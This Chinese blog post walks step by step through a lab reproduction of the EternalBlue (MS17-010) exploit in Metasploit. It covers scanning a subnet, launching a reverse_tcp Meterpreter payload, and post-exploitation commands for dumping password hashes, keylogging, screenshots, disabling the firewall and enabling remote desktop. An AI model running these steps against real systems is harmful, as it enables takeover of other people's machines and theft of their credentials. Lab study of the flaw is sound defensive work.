龙空技术网

网络安全—永恒之蓝漏洞复现

诺亚方舟jaken 154

前言:

现时兄弟们对“永恒之蓝漏洞攻击”大约比较着重,我们都想要分析一些“永恒之蓝漏洞攻击”的相关知识。那么小编同时在网摘上网罗了一些关于“永恒之蓝漏洞攻击””的相关内容,希望小伙伴们能喜欢,大家快快来学习一下吧!

2017年 网络上出现了可怕的网络安全漏洞-永恒之蓝 其目的就是攻击者可以使用该漏洞远程获取目标主机的管理员权限。

网络拓扑

永恒之蓝复现,这里准备了两台电脑,一台攻击机 一台靶机。

测试图谱

1、在攻击机器中启动命令msfconsole

启动msfconsole

2、在攻击机中搜索漏洞模块ms17-010

搜索ms17-010模块

3、先调用搜索到的模块,在查看该模块的配置选项。

查看模块的配置选项

4、设置要攻击靶机的ip地址,如果不清楚具体目标IP地址,可以设置IP地址段,如:192.168.1.*)

设置攻击目标ip地址

5、确认设置配置信息后,开始对目标靶机进行扫描,并且进行攻击。

对目标靶机进行扫描

6、显示带有Host is likely VULNERABLE的有可能就是存在漏洞的机器。

发现有漏洞的机器

7、利用ms17-010的漏洞进行攻击,在msfconsole中调用攻击模块,并查看选项。

利用ms17-010模块进行攻击

注:如果payload不是当前这个,建议更改payload 使用set payload windows/x64/meterpreter/reverse_tcp这个。

8、输入目标主机的ip地址后,再输入run命令进行攻击

设置目标主机,开始进行攻击

9、输入run命令后,就能获取导目标主机的session

获取目标主机的session

10、获取到目标主机的session后常用命令。

注意:发现有乱码,可以使用chcp 65001命令消除乱码。

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

11、获取到目标主机的session之后,就可以完全拿到管理员权限进行远程控制。

打开和关闭系统防火墙。

打开和关闭目标主机的系统防火墙

开启目标主机的远程桌面命令

run getgui -e或者run post/windows/manage/enable_rdp

然后再攻击机中输入rdesktop 192.168.1.150打开目标主机的桌面。

标签: #永恒之蓝漏洞攻击